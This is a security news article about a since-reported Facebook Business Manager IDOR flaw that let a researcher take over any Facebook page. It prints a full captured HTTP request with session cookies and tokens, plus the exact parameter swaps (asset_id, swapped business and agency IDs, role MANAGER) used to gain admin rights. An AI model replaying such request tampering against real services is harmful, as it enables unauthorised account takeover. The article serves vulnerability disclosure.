The Indian security researcher Arun Sureshkumar reported a critical vulnerability in the Facebook business manager that could be exploited by attackers to hack any Facebook page.
The Business Manager is the component that allows businesses to share and control access to assets on Facebook, including Pages and Ad accounts.
Facebook Business Manager also allows administrators to share access to Pages and ad accounts without being friends with coworkers on Facebook.
Before analyze the technique devised by the researcher let me introduce you the concept of Insecure Direct Object Reference.
According to the definition provided by the OWASP project, the Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability, an attacker can bypass authorization and access resources in the system directly.
“Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.” reads the OWASP.
Sureshkumar exploited an IDOR vulnerability in the Facebook Business Manager that allowed him to take over any Facebook page in less than 10 seconds.
Sureshkumar used his Facebook business account (ID =907970555981524) to add a partner. He used as a partner a test account with ID 991079870975788.
The hacker used Burp Suite to capture the request using Burp Suite, the tool allowed him to modify the request.
POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1 Host: business.facebook.com Connection: close Content-Length: 436 Origin: https://business.facebook.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6 parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733
What about hacking Facebook? How?
He changed the ‘asset id’ value with the one of the target page to hack, and also interchanged the ‘parent_business_id’ value with ‘agency_id’. He also changed the role value to ‘MANAGER’.
parent_business_id= 991079870975788 agency_id= 907970555981524 asset_id =190313461381022 role= MANAGER
With this simple trick, Sureshkumar demonstrated that hacking Facebook Pages was possible. He obtained admin rights on the business page.
Sureshkumar also published a video PoC of the attack.
The security expert reported the flaw to Facebook on August 29, 2016. Facebook investigated the problem and discovered also another flaw in its platform.
The giant of the social networks awarded Sureshkumar with 16,000 USD as part of its bug bounty program.
(Security Affairs – Hacking Facebook, Social Network)